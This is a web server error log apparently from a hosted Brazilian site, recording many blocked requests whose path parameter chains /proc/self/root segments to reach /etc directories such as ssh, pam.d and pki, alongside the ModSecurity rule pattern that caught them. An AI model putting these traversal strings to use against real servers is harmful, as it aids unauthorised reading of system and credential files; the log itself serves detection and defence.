https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:26:34.243036 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:50024] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfo6hXjF1vJNtV6CWrfgAAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:00.543089 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:34416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpBP9ocpUE4ed4uDzTUgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:27:03.883228 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:33618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpB46lpbStxTqkSktSLwAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:27:08.357555 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:33624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpDI6lpbStxTqkSktSOQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:09.575063 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.241.46:57964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpDQlT9VtDQc7bgUyNYwAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:27:18.643904 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:57966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpFglT9VtDQc7bgUyNawAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:27:20.980246 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:42940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpGI6lpbStxTqkSktSRgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:27:22.868629 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:50030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpGo6lpbStxTqkSktSSAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:27.595694 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.241.46:42946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpHxXjF1vJNtV6CWrfigAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:27:28.433601 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:35960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpILABkC4fWIHEf8HRBQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:30.787740 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:35970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpInjZBu2q05ozVU86UAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:34.557980 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:47410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpJglT9VtDQc7bgUyNcgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:35.851479 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:47426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpJ3jZBu2q05ozVU86UQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:41.349060 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:47434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpLXjZBu2q05ozVU86VgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:27:51.738173 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.244.31:45496] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfpN5qj1wV0Si-OkefN3AAAABA"]
[Mon Mar 16 08:28:06.099401 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:59878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpRrysWC90G-1nBrArLgAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:28:16.377261 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:56550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpUJqj1wV0Si-OkefN4wAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:28:26.531313 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:54588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpWhXjF1vJNtV6CWrfnAAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:28:29.949243 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:37756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpXXbQATo66fKoS7wvbwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:28:31.252855 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:38834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpX_9ocpUE4ed4uDzTWwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:28:32.541864 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:38836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpYLABkC4fWIHEf8HRCwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:28:33.362008 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:59372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpYdSswJuvopo3lOhFqwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:28:33.803016 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:38844] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpYXbQATo66fKoS7wvcwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:28:37.831210 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:50104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpZXbQATo66fKoS7wvfAAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
